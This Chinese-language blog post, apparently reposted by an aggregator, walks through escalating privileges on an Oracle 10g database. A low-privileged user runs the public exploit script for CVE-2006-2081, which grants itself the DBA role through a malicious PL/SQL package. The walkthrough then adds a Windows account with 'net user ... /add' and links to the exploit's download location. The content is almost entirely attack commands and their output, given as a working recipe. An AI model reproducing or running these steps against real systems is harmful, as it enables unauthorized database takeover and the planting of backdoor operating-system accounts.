Oracle 10g提权测试
Posted 专注于网络安全
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Oracle 10g提权测试相关的知识,希望对你有一定的参考价值。
一直想摸索一下orcl提权的方式,今天测试了一下10g,可以成功提权。
C:\wmpub>sqlplus scott/[email protected]
SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 10月 31 07:41:29 2016
Copyright (c) 1982, 2005, Oracle. All rights reserved.
连接到:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning, OLAP and Data Mining options
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
SQL> @dbms_exp_ext.sql
[+] dbms_exp_ext.sql exploit (CVE-2006-2081)
[+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
[+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
Target username (default TEST): scott
[-] Wait...
程序包已创建。
[-] Building evil package...
原值 6: EXECUTE IMMEDIATE ‘GRANT DBA TO &the_user‘;
新值 6: EXECUTE IMMEDIATE ‘GRANT DBA TO scott‘;
程序包体已创建。
[-] Finishing evil package...
PL/SQL 过程已成功完成。
[-] YOU GOT THE POWAH!!
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT DBA NO YES NO
SCOTT RESOURCE NO YES NO
SQL> host net user xiaozi xiaozi /add;
命令成功完成。
SQL> host net user;
\\WIN2003-WVS2 的用户帐户
-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_SNOWW-2CD7D87E5 IWAM_SNOWW-2CD7D87E5 SUPPORT_388945a0
xiaozi
命令成功完成。
提权脚本:http://rawlab.mindcreations.com/codes/exploit/oracle/dbms_exp_ext.sql
以上是关于Oracle 10g提权测试的主要内容,如果未能解决你的问题,请参考以下文章
Oracle 10g 应用补丁PSU 10.2.0.5.180717